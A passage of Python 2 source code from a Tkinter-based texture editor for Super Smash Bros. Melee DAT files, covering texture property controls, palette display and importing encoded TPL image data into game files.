globalDatFile.updateFlag( jointStruct, 1, 29, True ) # ROOT_XLU
modifiedJoints.append( parentStructOffset )
updateProgramStatus( 'Transparency Updated' )
class EnumOptionMenu( ttk.OptionMenu ):
def __init__( self, parent, structures, fieldIndex ):
self.structures = structures
self.fieldIndex = fieldIndex
if type( structures ) == list:
structure = structures[0]
else: # It's just one structure object
structure = structures
# Get the current value of the enumeration
self.currentEnum = structure.getValues()[fieldIndex]
self.fieldName = structure.fields[fieldIndex]
# Enumerations must be provided by the structure class
self.enumerations = structure.enums[self.fieldName] # Retrieves a dictionary of the form key=enumInt, value=enumNameString
self.optionNames = self.enumerations.values()
defaultOption = self.enumerations[self.currentEnum]
textVar = Tk.StringVar() # Required to init the optionmenu
ttk.OptionMenu.__init__( self, parent, textVar, defaultOption, *self.optionNames, command=self.optionSelected )
def optionSelected( self, newOption ):
# Convert the option name to the enumeration value
newEnum = self.optionNames.index( newOption )
if newEnum == self.currentEnum:
return # Nothing to do here
# Replace the data in the file and structure for each one
updateName = self.fieldName.replace( '\n', ' ' )
descriptionOfChange = updateName + ' modified in ' + globalDatFile.fileName
if type( self.structures ) == list:
for structure in self.structures:
globalDatFile.updateStructValue( structure, self.fieldIndex, newEnum, descriptionOfChange )
else: # The offsets attribute is just a single struct (the usual case)
globalDatFile.updateStructValue( self.structures, self.fieldIndex, newEnum, descriptionOfChange )
updateProgramStatus( updateName + ' Updated' )
def populateTexPropertiesTab( wraplength, width, height, thisImageType ):
""" Populates the Properties tab of the DAT Texture Tree interface. At this point, the pane has already been cleared. """
propertiesPane = Gui.texturePropertiesPane.interior
texStructs = Gui.modelPropertiesPane.interior.textureStructs
matStructs = Gui.modelPropertiesPane.interior.materialStructs
pixStructs = [] # Pixel Processing structures
vertPadding = 10
# Make sure there are Texture Structs to edit
if not texStructs:
noTexStructText = ( 'No Texture Structs found; there are no editable properties. If this texture is part of '
'a material animation, find the default texture for that animation and edit that instead.' )
ttk.Label( propertiesPane, text=noTexStructText, wraplength=wraplength ).pack( pady=vertPadding*2 )
return
# Collect offsets that we'll need for the HexEditEntries.
# Also, get the flags data, and check if they're the same across all tex structs for this texture.
matFlagOffsets = [ matStruct.offset+4 for matStruct in matStructs ]
texFlagFieldOffsets = []
pixelProcFlagOffsets = []
blendingOffsets = []
wrapModeSoffsets = []
wrapModeToffsets = []
reapeatSoffsets = []
reapeatToffsets = []
matFlagsData = set()
texFlagsData = set()
pixFlagsData = set()
blendingData = set()
wrapSData = set()
wrapTData = set()
repeatSData = set()
repeatTData = set()
# Populate the above lists with the actual hex data from the file
for texStruct in texStructs:
texFlagFieldOffsets.append( texStruct.offset + 0x40 )
wrapModeSoffsets.append( texStruct.offset + 0x34 )
wrapModeToffsets.append( texStruct.offset + 0x38 )
reapeatSoffsets.append( texStruct.offset + 0x3C )
reapeatToffsets.append( texStruct.offset + 0x3D )
texFlagsData.add( hexlify(texStruct.data[0x40:0x44]) )
wrapSData.add( hexlify(texStruct.data[0x34:0x38]) )
wrapTData.add( hexlify(texStruct.data[0x38:0x3C]) )
repeatSData.add( hexlify(texStruct.data[0x3C:0x3D]) )
repeatTData.add( hexlify(texStruct.data[0x3D:0x3E]) )
for matStructure in matStructs:
matFlagsData.add( hexlify(matStructure.data[0x4:0x8]) )
# Check if there's a valid pointer to a Pixel Proc. structure, and get flags from it if there is
if matStructure.offset + 0x14 in globalDatFile.pointerOffsets:
pixelProcStructOffset = matStructure.getValues()[-1]
pixProcStruct = globalDatFile.initSpecificStruct( hsdStructures.PixelProcObjDesc, pixelProcStructOffset, matStructure.offset )
if pixProcStruct:
pixStructs.append( pixProcStruct )
pixelProcFlagOffsets.append( pixelProcStructOffset )
pixFlagsData.add( hexlify(globalDatFile.getData(pixelProcStructOffset, 1)) )
blendingOffsets.append( pixelProcStructOffset + 4 )
blendingData.add( ord(globalDatFile.getData(pixelProcStructOffset+4, 1)) )
displayDifferingDataWarning = False
# Describe the number of Texture Structs found
if len( texStructs ) == 1:
texCountLabel = ttk.Label( propertiesPane, text='These controls will edit 1 set of structures.', wraplength=wraplength )
else:
texCountLabelText = 'These controls will edit {} sets of structures.\nTo edit individual structs, use the Structural Analysis tab.'.format( len(texStructs) )
texCountLabel = ttk.Label( propertiesPane, text=texCountLabelText, wraplength=wraplength )
texCountLabel.pack( pady=(vertPadding*2, 0) )
ttk.Separator( propertiesPane, orient='horizontal' ).pack( fill='x', padx=24, pady=(vertPadding*2, 0) )
flagsFrame = Tk.Frame( propertiesPane )
if len( pixFlagsData ) > 0:
# Add blending options
ttk.Label( flagsFrame, text='Blending Mode:' ).grid( column=0, row=0, sticky='e' )
if len( blendingData ) > 1: # Add a 2 px border around the widget using a Frame (the widget itself doesn't support a border)
optionMenuBorderFrame = Tk.Frame( flagsFrame, background='orange' )
blendingMenu = EnumOptionMenu( optionMenuBorderFrame, pixStructs, 4 )
blendingMenu.pack( padx=2, pady=2 )
optionMenuBorderFrame.grid( column=1, row=0, columnspan=2, padx=7 )
displayDifferingDataWarning = True
else:
blendingMenu = EnumOptionMenu( flagsFrame, pixStructs[0], 4 )
blendingMenu.grid( column=1, row=0, columnspan=2, padx=7 )
# Add widgets for the Pixel Processing Flags label, hex edit Entry, and Flags 'Decode' button
ttk.Label( flagsFrame, text='Pixel Processing Flags:' ).grid( column=0, row=1, sticky='e' )
hexEntry = HexEditEntry( flagsFrame, pixelProcFlagOffsets, 1, 'B', 'Pixel Processing Flags' )
hexEntry.insert( 0, next(iter(pixFlagsData)).upper() )
hexEntry.bind( '<Return>', updateEntryHex )
hexEntry.grid( column=1, row=1, padx=7, pady=1 )
Gui.texturePropertiesPane.flagWidgets.append( hexEntry )
if len( pixFlagsData ) > 1:
hexEntry['highlightbackground'] = 'orange'
hexEntry['highlightthickness'] = 2
displayDifferingDataWarning = True
flagsLabel = ttk.Label( flagsFrame, text='Decode', foreground='#00F', cursor='hand2' )
flagsLabel.grid( column=2, row=1, pady=0 )
flagsLabel.bind( '<1>', lambda e, s=pixStructs[0], fO=pixelProcFlagOffsets: FlagDecoder(s, fO, 0) )
else:
ttk.Label( flagsFrame, text='Pixel Processing is not used on this texture.', wraplength=wraplength ).grid( column=0, row=0, columnspan=3, pady=(0, vertPadding) )
# Add widgets for the Render Mode Flags label, hex edit Entry, and Flags 'Decode' button
ttk.Label( flagsFrame, text='Render Mode Flags:' ).grid( column=0, row=2, sticky='e' )
hexEntry = HexEditEntry( flagsFrame, matFlagOffsets, 4, 'I', 'Render Mode Flags' )
hexEntry.grid( column=1, row=2, padx=7, pady=1 )
Gui.texturePropertiesPane.flagWidgets.append( hexEntry )
if len( matFlagsData ) == 0:
hexEntry['state'] = 'disabled'
else:
hexEntry.insert( 0, next(iter(matFlagsData)).upper() )
hexEntry.bind( '<Return>', updateEntryHex )
flagsLabel = ttk.Label( flagsFrame, text='Decode', foreground='#00F', cursor='hand2' )
flagsLabel.grid( column=2, row=2, pady=0 )
flagsLabel.bind( '<1>', lambda e, s=matStructs[0], fO=matFlagOffsets: FlagDecoder(s, fO, 1) )
if len( matFlagsData ) > 1:
hexEntry['highlightbackground'] = 'orange'
hexEntry['highlightthickness'] = 2
displayDifferingDataWarning = True
# Add widgets for the Texture Flags label, hex edit Entry, and Flags 'Decode' button
ttk.Label( flagsFrame, text='Texture Flags:' ).grid( column=0, row=3, sticky='e' )
hexEntry = HexEditEntry( flagsFrame, texFlagFieldOffsets, 4, 'I', 'Texture Flags' )
hexEntry.grid( column=1, row=3, padx=7, pady=1 )
Gui.texturePropertiesPane.flagWidgets.append( hexEntry )
if len( texFlagsData ) == 0:
hexEntry['state'] = 'disabled'
else:
hexEntry.insert( 0, next(iter(texFlagsData)).upper() )
hexEntry.bind( '<Return>', updateEntryHex )
flagsLabel = ttk.Label( flagsFrame, text='Decode', foreground='#00F', cursor='hand2' )
flagsLabel.grid( column=2, row=3 )
flagsLabel.bind( '<1>', lambda e, s=texStructs[0], fO=texFlagFieldOffsets: FlagDecoder(s, fO, 18) )
if len( texFlagsData ) > 1:
hexEntry['highlightbackground'] = 'orange'
hexEntry['highlightthickness'] = 2
displayDifferingDataWarning = True
flagsFrame.pack( pady=(vertPadding*2, 0) )
# Add Wrap Mode and Repeat Mode
modesFrame = Tk.Frame( propertiesPane )
wrapOptions = OrderedDict( [('Clamp', 0), ('Repeat', 1), ('Mirrored', 2), ('Reserved', 3)] )
# Wrap Mode S
ttk.Label( modesFrame, text='Wrap Mode S:' ).grid( column=0, row=0, sticky='e' )
defaultWrapS = int( next(iter(wrapSData)), 16 ) # Gets one of the hex values collected from the struct(s), and then converts it to an int
if len( wrapSData ) > 1:
frameBorder = Tk.Frame( modesFrame, background='orange' ) # The optionmenu widget doesn't actually support a border :/
dropdown = HexEditDropdown( frameBorder, wrapModeSoffsets, 4, 'I', 'Wrap Mode S', wrapOptions, defaultWrapS, command=updateEntryValue )
dropdown.pack( padx=2, pady=2 )
frameBorder.grid( column=1, row=0, padx=7, pady=1 )
displayDifferingDataWarning = True
else:
dropdown = HexEditDropdown( modesFrame, wrapModeSoffsets, 4, 'I', 'Wrap Mode S', wrapOptions, defaultWrapS, command=updateEntryValue )
dropdown.grid( column=1, row=0, padx=7, pady=1 )
# Wrap Mode T
ttk.Label( modesFrame, text='Wrap Mode T:' ).grid( column=0, row=1, sticky='e' )
defaultWrapT = int( next(iter(wrapTData)), 16 ) # Gets one of the hex values collected from the struct(s), and then converts it to an int
if len( wrapTData ) > 1:
frameBorder = Tk.Frame( modesFrame, background='orange' ) # The optionmenu widget doesn't actually support a border :/
dropdown = HexEditDropdown( frameBorder, wrapModeToffsets, 4, 'I', 'Wrap Mode T', wrapOptions, defaultWrapT, command=updateEntryValue )
dropdown.pack( padx=2, pady=2 )
frameBorder.grid( column=1, row=1, padx=7, pady=1 )
displayDifferingDataWarning = True
else:
dropdown = HexEditDropdown( modesFrame, wrapModeToffsets, 4, 'I', 'Wrap Mode T', wrapOptions, defaultWrapT, command=updateEntryValue )
dropdown.grid( column=1, row=1, padx=7, pady=1 )
# Repeat Mode S
ttk.Label( modesFrame, text='Repeat Mode S:' ).grid( column=2, row=0, sticky='e', padx=(7, 0) )
hexEntry = HexEditEntry( modesFrame, reapeatSoffsets, 1, '?', 'Repeat Mode S' )
hexEntry.insert( 0, next(iter(repeatSData)).upper() )
hexEntry.bind( '<Return>', updateEntryHex )
hexEntry.grid( column=3, row=0, padx=7, pady=1 )
if len( repeatSData ) > 1:
hexEntry['highlightbackground'] = 'orange'
hexEntry['highlightthickness'] = 2
displayDifferingDataWarning = True
# Repeat Mode T
ttk.Label( modesFrame, text='Repeat Mode T:' ).grid( column=2, row=1, sticky='e', padx=(7, 0) )
hexEntry = HexEditEntry( modesFrame, reapeatToffsets, 1, '?', 'Repeat Mode T' )
hexEntry.insert( 0, next(iter(repeatTData)).upper() )
hexEntry.bind( '<Return>', updateEntryHex )
hexEntry.grid( column=3, row=1, padx=7, pady=1 )
if len( repeatTData ) > 1:
hexEntry['highlightbackground'] = 'orange'
hexEntry['highlightthickness'] = 2
displayDifferingDataWarning = True
modesFrame.pack( pady=(vertPadding, 0) )
if displayDifferingDataWarning:
differingDataLabelText = ( 'Warning! Values with an orange border are different across the multiple structures '
'that these controls will modify; you may want to exercise caution when changing them '
'here, which would make them all the same.' )
differingDataLabel = ttk.Label( propertiesPane, text=differingDataLabelText, wraplength=wraplength )
differingDataLabel.pack( pady=(vertPadding*2, 0) )
# Add alternative texture sizes
ttk.Separator( propertiesPane, orient='horizontal' ).pack( fill='x', padx=24, pady=(vertPadding*2, 0) )
ttk.Label( propertiesPane, text='Alternative Texture Sizes:' ).pack( pady=(vertPadding*2, 0) )
altImageSizesFrame = Tk.Frame( propertiesPane )
sizesDict = OrderedDict()
for i, imageType in enumerate( ( 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 14 ) ):
thisSize = hsdStructures.ImageDataBlock.getDataLength( width, height, imageType )
if imageType == thisImageType: continue
if not thisSize in sizesDict:
sizesDict[thisSize] = [userFriendlyFormatList[i]]
else:
sizesDict[thisSize].append( userFriendlyFormatList[i] )
row = 0
for size, formatList in sizesDict.items():
ttk.Label( altImageSizesFrame, text=' / '.join( formatList ) ).grid( column=0, row=row, sticky='w' )
ttk.Label( altImageSizesFrame, text=uHex( size ) ).grid( column=1, row=row, sticky='w', padx=(12, 0) )
row += 1
altImageSizesFrame.pack()
class PointerLink( ttk.Label ):
""" Simple label widget to provide an arrow button, which when clicked, searches for a structure in the SA tab. """
def __init__( self, parent, structOffset ):
self.offset = structOffset
# Create the label, bind a click event handler to it, and add a tooltip message
ttk.Label.__init__( self, parent, text='-->', foreground='#00F', cursor='hand2' )
self.bind( '<1>', self.clicked )
ToolTip( self, text='Show', delay=500 )
def clicked( self, event ):
showStructInStructuralAnalysis( self.offset )
# Switch to the SA tab
Gui.mainTabFrame.select( Gui.savTab )
def determineMaxPaletteColors( imageType, paletteStructLength ):
""" Determines the maximum number of colors that are suppored by a palette. Image type and palette
data struct length are both considered, going with the lower limit between the two. """
if imageType == 8: # 4-bit
maxColors = 16
elif imageType == 9: # 8-bit
maxColors = 256
elif imageType == 10: # 14-bit
maxColors = 16384
else:
print 'Invalid image type given to determineMaxPaletteColors():', imageType
return 0
# The actual structure length available overrides the image's type limitation
maxColorsBySpace = paletteStructLength / 2
if maxColorsBySpace < maxColors:
maxColors = maxColorsBySpace
return maxColors
def populatePaletteTab( imageDataOffset, imageDataLength, imageType ):
# If a palette entry was previously highlighted/selected, keep it that way
previouslySelectedEntryOffset = -1
selectedEntries = Gui.paletteCanvas.find_withtag( 'selected' )
if selectedEntries:
tags = Gui.paletteCanvas.gettags( selectedEntries[0] )
# Get the other tag, which will be the entry's file offset
for tag in tags:
if tag != 'selected':
previouslySelectedEntryOffset = int( tag.replace('t', '') ) # 't' included in the first place because the tag cannot be purely a number
break
Gui.paletteCanvas.delete( 'all' )
Gui.paletteCanvas.paletteEntries = [] # Storage for the palette square images, so they're not garbage collected. (Using images for their canvas-alpha support.)
Gui.paletteCanvas.itemColors = {} # For remembering the associated color within the images (rather than looking up pixel data within the image) and other info, to be passed on to the color picker
# Try to get info on the palette palette
paletteDataOffset, paletteHeaderOffset, paletteLength, paletteType, colorCount = getPaletteInfo( globalDatFile, imageDataOffset )
if paletteDataOffset == -1: # Couldn't find the data. Set all values to 'not available (n/a)'
Gui.paletteDataText.set( 'Data Offset:\nN/A' )
Gui.paletteHeaderText.set( 'Header Offset:\nN/A' )
Gui.paletteTypeText.set( 'Palette Type:\nN/A' )
Gui.paletteMaxColorsText.set( 'Max Colors:\nN/A' )
Gui.paletteStatedColorsText.set( 'Stated Colors:\nN/A' )
#Gui.paletteActualColorsText.set( 'Actual Colors:\nN/A' )
return
# Get the image and palette data
imageData = globalDatFile.getData( imageDataOffset, imageDataLength )
paletteData = hexlify( getPaletteData(globalDatFile, paletteDataOffset=paletteDataOffset, imageData=imageData, imageType=imageType)[0] )
# Update all fields and the palette canvas (to display the color entries).
Gui.paletteDataText.set( 'Data Offset:\n' + uHex(paletteDataOffset + 0x20) )
if paletteHeaderOffset == -1: Gui.paletteHeaderText.set( 'Header Offset:\nNone' )
else: Gui.paletteHeaderText.set( 'Header Offset:\n' + uHex(paletteHeaderOffset + 0x20) )
if paletteType == 0: Gui.paletteTypeText.set( 'Palette Type:\n0 (IA8)' )
if paletteType == 1: Gui.paletteTypeText.set( 'Palette Type:\n1 (RGB565)' )
if paletteType == 2: Gui.paletteTypeText.set( 'Palette Type:\n2 (RGB5A3)' )
Gui.paletteMaxColorsText.set( 'Max Colors:\n' + str(determineMaxPaletteColors( imageType, paletteLength )) )
Gui.paletteStatedColorsText.set( 'Stated Colors:\n' + str(colorCount) )
#Gui.paletteActualColorsText.set( 'Actual Colors:\n' + str(len(paletteData)/4) )
# Create the initial/top offset indicator.
x = 7
y = 11
Gui.paletteCanvas.create_line( 105, y-3, 120, y-3, 130, y+4, 175, y+4, tags='descriptors' ) # x1, y1, x2, y2, etc....
Gui.paletteCanvas.create_text( 154, y + 12, text=uHex(paletteDataOffset + 0x20), tags='descriptors' )
# Populate the canvas with the palette entries.
for i in xrange( 0, len(paletteData), 4 ): # For each palette entry....
paletteEntry = paletteData[i:i+4]
entryNum = i/4
paletteEntryOffset = paletteDataOffset + i/2
x = x + 12
rgbaColor = tplDecoder.decodeColor( paletteType, paletteEntry, decodeForPalette=True ) # rgbaColor = ( r, g, b, a )
# Prepare and store an image object for the entry (since .create_rectangle doesn't support transparency)
paletteSwatch = Image.new( 'RGBA', (8, 8), rgbaColor )
Gui.paletteCanvas.paletteEntries.append( ImageTk.PhotoImage(paletteSwatch) )
# Draw a rectangle for a border; start by checking whether this is a currently selected entry
if paletteEntryOffset == previouslySelectedEntryOffset:
borderColor = Gui.paletteCanvas.entryBorderColor
tags = ('selected', 't'+str(paletteEntryOffset) )
else:
borderColor = 'black'
tags = 't'+str(paletteEntryOffset)
Gui.paletteCanvas.create_line( x-1, y-1, x+8, y-1, x+8, y+8, x-1, y+8, x-1, y-1, fill=borderColor, tags=tags )
# Draw the image onto the canvas.
itemId = Gui.paletteCanvas.create_image( x, y, image=Gui.paletteCanvas.paletteEntries[entryNum], anchor='nw', tags='entries' )
Gui.paletteCanvas.itemColors[itemId] = ( rgbaColor, paletteEntry, paletteEntryOffset, imageDataOffset )
if x >= 103: # End of the row (of 8 entries); start a new row.
x = 7
y = y + 11
i = i / 4 + 1
# Check if the current palette entry is a multiple of 32 (4 lines)
if float( i/float(32) ).is_integer() and i < len( paletteData )/4: # (second check prevents execution after last chunk of 0x40)
y = y + 6
Gui.paletteCanvas.create_line( 105, y-3, 117, y-3, 130, y+4, 176, y+4, tags='descriptors' ) # x1, y1, x2, y2, etc....
Gui.paletteCanvas.create_text( 154, y + 12, text=uHex(paletteDataOffset + 0x20 + i*2), tags='descriptors' )
def onColorClick( event ):
# Determine which canvas item was clicked on, and use that to look up all entry info
itemId = event.widget.find_closest( event.x, event.y )[0]
if itemId not in Gui.paletteCanvas.itemColors: return # Abort. Probably clicked on a border.
canvasItemInfo = Gui.paletteCanvas.itemColors[itemId]
initialHexColor = ''.join( [ "{0:0{1}X}".format( channel, 2 ) for channel in canvasItemInfo[0] ] )
MeleeColorPicker( 'Change Palette Color', initialHexColor, paletteType, windowId=itemId, datDataOffsets=canvasItemInfo )
def onMouseEnter(e): Gui.paletteCanvas['cursor']='hand2'
def onMouseLeave(e): Gui.paletteCanvas['cursor']=''
Gui.paletteCanvas.tag_bind( 'entries', '<1>', onColorClick )
Gui.paletteCanvas.tag_bind( 'entries', '<Enter>', onMouseEnter )
Gui.paletteCanvas.tag_bind( 'entries', '<Leave>', onMouseLeave )
def writeTextureToDat( datFile, imageFilepath, imageDataOffset, updateGui, subsequentMipmapPass=False ):
""" Collects information on the image being imported, encodes it as raw TPL data, and writes it into the DAT's file data.
Returns the success/fail status of the operation, and some information on the palette, if one failed to import.
"status" may be one of the following strings:
dataObtained operation (image encoding and import) successful
paletteRegenerated [for paletted textures] operation successful, and a new palette was generated
dataWithAdHocPalette depricated; shouldn't be possible anymore. same as above, except the encoding and palette generation was done by wimgt
formatUnsupported unable to encode/import, likely because the image was not a PNG or TPL file
imageHeaderNotFound couldn't find headers for image data located at imageDataOffset. the offset is likely wrong, or the header was modified
invalidMipmapDims
imageTypeNotFound
notEnoughSpace
or an exit code (of failed conversion) """
# Collect info on this image
newImagePath = imageFilepath # Temp filepath for mipmap textures; subsequent mipmap levels will be downsized from the original image file
iid = str( imageDataOffset ) # For the datTextureTree treeview, an iid is the image data offset.
updateDataHeaders = generalBoolSettings['autoUpdateHeaders'].get()
headersAvailable = True
datIsEffectsFile = isEffectsFile( datFile )
lastEffTextureOffset = getattr( globalDatFile, 'lastEffTexture', -1 ) # Only relavant with effects files
# Treat this as a DOL file if this is for special alphabet character textures in SdMenu.dat/.usd (these have no headers)
if datFile.rootNodes != [] and datFile.rootNodes[0] == (0, 'SIS_MenuData'):
targetFileExt = 'dol'
else:
targetFileExt = datFile.path.split( '.' )[-1].lower()
mipmapLevel = getMipmapLevel( iid )
if targetFileExt == 'dol': # Special processing for DOLs, since they have no image data headers.
origWidth = 32; origHeight = 32; origImageType = 0
origImageDataLength = 0x200
headersAvailable = False
elif targetFileExt == 'bnr': # Special processing for Banners, since they have no image data headers.
origWidth = 96; origHeight = 32; origImageType = 5
origImageDataLength = 0x1800
headersAvailable = False
elif mipmapLevel > -1: # Special processing for mipmap images
imageDataOffset, origImageDataLength, origWidth, origHeight, origImageType = parseTextureDetails( iid )
# Create a temp file name and save location.
sourceDatFilename = os.path.basename( datFile.path ).split('_')[-1]
newFileName = sourceDatFilename + '_' + uHex(imageDataOffset + 0x20) + '_' + str(origImageType)
# Get the Game ID if this file was loaded from a disc.
if datFile.source == 'disc' and globalDiscDetails['gameId'] != '': # Means an ISO has been loaded, and (using the file path) the current dat is not from an outside standalone file.
gameID = globalDiscDetails['gameId']
else: gameID = 'No Associated Disc'
# Construct the destination file path, and create the folders if they don't already exist.
destinationFolder = texDumpsFolder + '\\' + gameID + '\\' + sourceDatFilename + '\\'
if not os.path.exists(destinationFolder): os.makedirs(destinationFolder)
# If the imported file is in TPL format, convert it to PNG
if imageFilepath[-4:] == '.tpl':
newImage = tplDecoder( imageFilepath, (origWidth, origHeight), origImageType )
imageFilepath = destinationFolder + newFileName + '.tpl'
newImage.createPngFile( imageFilepath, creator='DTW - v' + programVersion )
# Open the image that will be used as a base for all mipmap levels
mipmapImage = Image.open( imageFilepath )
# Validate the image's dimensions, and resize it if needed
if mipmapImage.size != (origWidth, origHeight):
if not subsequentMipmapPass: return ( 'invalidMipmapDims', '', '' )
else:
# Downscale the original texture to the current mipmap level's size.
filters = { 'nearest': 0, 'lanczos': 1, 'bilinear': 2, 'bicubic': 3 }
filterId = filters[settings.get( 'General Settings', 'downscalingFilter' )]
mipmapImage = mipmapImage.resize( (origWidth, origHeight), resample=filterId )
# Save the image data to a memory buffer so it can be sent to the encoder without creating a file (needed for wimgt).
#imageBuffer = StringIO()
#mipmapImage.save( imageBuffer, 'png' )
#newImagePath = imageBuffer.getvalue()
#newImagePath = imageBuffer
# Save the image data to a new file (#todo: once wimgt is no longer needed, use above method to prevent needing to create a file)
newImagePath = destinationFolder + newFileName + '.png'
mipmapImage.save( newImagePath, 'png' )
elif (0x1E00, 'MemSnapIconData') in datFile.rootNodes: # The file is LbMcSnap.usd or LbMcSnap.dat (Memory card banner/icon file from SSB Melee)
headersAvailable = False
if imageDataOffset == 0:
origWidth = 96; origHeight = 32
origImageType = 5
origImageDataLength = 0x1800
else: # There are only two images in this file
origWidth = 32; origHeight = 32
origImageType = 9
origImageDataLength = 0x400
elif (0x4E00, 'MemCardIconData') in datFile.rootNodes: # The file is LbMcGame.usd or LbMcGame.dat (Memory card banner/icon file from SSB Melee)
headersAvailable = False
if imageDataOffset < 0x4800:
origWidth = 96; origHeight = 32
origImageType = 5
origImageDataLength = 0x1800
else:
origWidth = 32; origHeight = 32
origImageType = 9
origImageDataLength = 0x400
elif datIsEffectsFile and imageDataOffset <= lastEffTextureOffset:
headersAvailable = False # Some image data headers are shared in this file, so they can't be changed (unless all are changed)
_, origImageDataLength, origWidth, origHeight, origImageType = parseTextureDetails( iid ) # todo: fix this; it won't work with disc import method
else:
# Validate the given image data offset
if imageDataOffset not in datFile.structureOffsets:
msg( 'Invalid Texture offset detected: ' + hex(0x20+imageDataOffset) + '; unable to write texture into DAT.' )
return ( 'invalidTextureOffset', '', '' ) # todo; this is not yet specifically handled in the texture import function
# Gather info on the texture currently in the DAT/USD.
imageDataStruct = datFile.initDataBlock( hsdStructures.ImageDataBlock, imageDataOffset )
_, origWidth, origHeight, origImageType, _, _, _ = imageDataStruct.getAttributes()
origImageDataLength = getImageDataLength( origWidth, origHeight, origImageType )
# Gather palette information on the texture currently in the DAT.
if origImageType == 8 or origImageType == 9 or origImageType == 10:
# Find information on the associated palette (if unable to, return).
paletteDataOffset, paletteHeaderOffset, paletteLength, origPaletteType, origPaletteColorCount = getPaletteInfo( datFile, imageDataOffset )
if paletteDataOffset == -1: return ( 'paletteNotFound', '', '' )
# If not updating data headers, assume the current palette format must be preserved, and prevent the tplCodec from choosing one (if it creates a palette)
# In other words, if there are data headers, leave this unspecified so that the codec may intelligently choose the best palette type.
if updateDataHeaders and headersAvailable:
origPaletteType = None # No known value descriptiong for palette type in effects files
maxPaletteColorCount = paletteLength / 2
else:
origPaletteType = None
origPaletteColorCount = 255
maxPaletteColorCount = 255
# Encode the image data into TPL format
try:
newImage = tplEncoder( newImagePath, imageType=origImageType, paletteType=origPaletteType, maxPaletteColors=maxPaletteColorCount )
newImageData = newImage.encodedImageData
newPaletteData = newImage.encodedPaletteData
newImageType = newImage.imageType
newImageHeader = "{0:0{1}X}".format( newImage.width, 4 ) + "{0:0{1}X}".format( newImage.height, 4 ) + "{0:0{1}X}".format(newImageType, 8)
status = 'dataObtained'
except TypeError: # For CMPR (_14) textures.
(status, newImageHeader, newImageData, _, newPaletteData) = getImageFileAsTPL( newImagePath, origImageType )
newImageData = bytearray.fromhex( newImageData )
newPaletteData = bytearray.fromhex( newPaletteData )
newImageType = int( newImageHeader[-2:], 16 )
# If this codec is attempted, none of the exceptions below will be triggered; status will come from getImageFileAsTPL above.
except IOError:
status = 'formatUnsupported'
except missingType:
status = 'imageTypeNotFound'
except Exception as error:
print 'Encoding fail error:', error
status = 'failedEncoding'
#if mipmapData: imageBuffer.close()
# Validate banner dimensions before importing it to the DAT file
if targetFileExt == 'bnr' and ( newImage.width != 96 or newImage.height != 32):
return ( 'invalidDimensions', '', '' )
# Texture info collected and texture data encoded.
if status != 'dataObtained' and status != 'dataWithAdHocPalette':
return ( status, '', '' )
else:
newImageDataLength = len( newImageData )
# Image properly imported to program's memory. Check that it will fit in the alloted space and whether a palette also needs to be replaced.
if newImageDataLength > origImageDataLength: return ( 'notEnoughSpace', '', '' )
else:
# If this is not a DOL file, then add 0x20 bytes to account for a DAT's file header.
adjustedImageDataOffset = imageDataOffset
if not targetFileExt == 'dol': adjustedImageDataOffset += 0x20
if newImageType == 8 or newImageType == 9 or newImageType == 10:
# Check if a new palette was generated, and whether it's currently permitted to use a new one
if newImage.paletteRegenerated and not generalBoolSettings['regenInvalidPalettes'].get():
unpermittedPaletteRegen = True
else: unpermittedPaletteRegen = False
# Make sure there is space for the new palette, and update the dat's data with it.
newPaletteColorCount = len( newPaletteData ) / 2 # All of the palette types (IA8, RGB565, and RGB5A3) are 2 bytes per color entry
if newPaletteColorCount <= maxPaletteColorCount and not unpermittedPaletteRegen:
entriesToFill = origPaletteColorCount - newPaletteColorCount
nullData = '8000' * entriesToFill # 8000 typically seen as null entry data for palettes
nullBytes = bytearray.fromhex( nullData )
# Update the palette data header (if there is one)
if origPaletteType != newImage.paletteType:
if not headersAvailable:
return ( 'invalidPaletteProperties', origPaletteType, newImage.paletteType )
elif updateDataHeaders:
descriptionOfChange = 'Palette type updated in header'
datFile.updateData( paletteHeaderOffset+7, newImage.paletteType, descriptionOfChange ) # sets the palette type
else:
msg('Warning: The texture imported to ' + uHex( adjustedImageDataOffset ) + ' has a different palette type than the current '
'one, and automatic updating of data headers is disabled. This could lead '
"to undesired effects or crashes.\n\nIf you know what you're doing, so be it. If not, you can re-enable Auto-Update Headers "
"in the Settings menu and re-import this texture to solve this, or manually edit the header(s) in the Structural Analysis tab.",
'Different Palette Type Detected')
# Update the palette data
datFile.updateData( paletteDataOffset, newPaletteData + nullBytes, 'Palette data updated' )
if newImage.paletteRegenerated: status = 'paletteRegenerated'
else:
return ( 'paletteTooLarge', str(maxPaletteColorCount), str(newImage.originalPaletteColorCount) )
# Look at the image data headers to see whether the current ones should be updated.
currentHeader = "{0:0{1}X}".format(origWidth, 4) + "{0:0{1}X}".format(origHeight, 4) + "{0:0{1}X}".format(origImageType, 8) # 8 bytes total
if currentHeader.lower() != newImageHeader.lower():
if not headersAvailable:
return ( 'invalidImageProperties', (origWidth, origHeight), origImageType )
# If the auto-update is enabled, update each image data header to match the new texture's properties. Otherwise, warn the user of the difference.
elif updateDataHeaders:
headerOffsets = datFile.structs[imageDataOffset].getParents()
for offset in headerOffsets:
datFile.updateData( offset+4, bytearray.fromhex(newImageHeader), 'Image type updated in header' )
else:
msg('Warning: The texture imported to ' + uHex( adjustedImageDataOffset ) + ' has different properties than the current '
'one (width, height, or texture type), and automatic updating of data headers is disabled. This could lead '
"to undesired effects or crashes.\n\nIf you know what you're doing, so be it. If not, you can re-enable Auto-Update Headers "
"in the Settings menu and re-import this texture to solve this, or manually edit the header(s) in the Structural Analysis tab.",
'Different Image Data Properties Detected')
# If the new texture is smaller than the original, fill the extra space with zeroes
if newImageDataLength < origImageDataLength:
newImageData.extend( bytearray(origImageDataLength - newImageDataLength) ) # Adds n bytes of null data
# Update the texture image data in the file
datFile.updateData( imageDataOffset, newImageData, 'Image data updated' )
# Check for potentially invalid image dimensions
# Parse the newImageHeader for the new dimensions (can't use newImage.width because a newImage might not have been created)
width = int( newImageHeader[:4], 16 )
height = int( newImageHeader[4:8], 16 )
# if width > 1024 or width % 2 != 0 or height > 1024 or height % 2 != 0:
# status = 'invalidDimensions'
# tags = list( Gui.datTextureTree.item( iid, 'tags' ) )
# if 'warn' not in tags:
# tags.append( 'warn' )
# Gui.datTextureTree.item( iid, tags=tags )
if updateGui: # Update the image displayed in the GUI on the DAT Texture Tree tab
renderTextureData( imageDataOffset, width, height, newImageType, newImageDataLength, allowImageDumping=False )
# Update the GUI/treeview's values for the texture.
newValues = (
uHex(adjustedImageDataOffset) + '\n(' + uHex(newImageDataLength) + ')', # offset to image data, and data length
